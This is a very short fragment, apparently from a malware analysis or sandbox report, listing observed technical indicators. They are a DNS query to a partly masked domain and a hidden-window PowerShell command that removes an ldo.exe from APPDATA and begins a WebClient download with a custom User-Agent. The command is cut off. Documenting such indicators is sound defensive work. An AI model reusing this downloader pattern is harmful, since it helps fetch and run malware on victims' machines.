Technical Information
- DNS ASK c.##wd.se
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\ldo.exe') {Remove-Item $env:APPDATA + '\ldo.exe'}; $newP = New-Object System.Net.WebClient; $newP.Headers['User-Agent'] = 'come-t...' (with hidden window)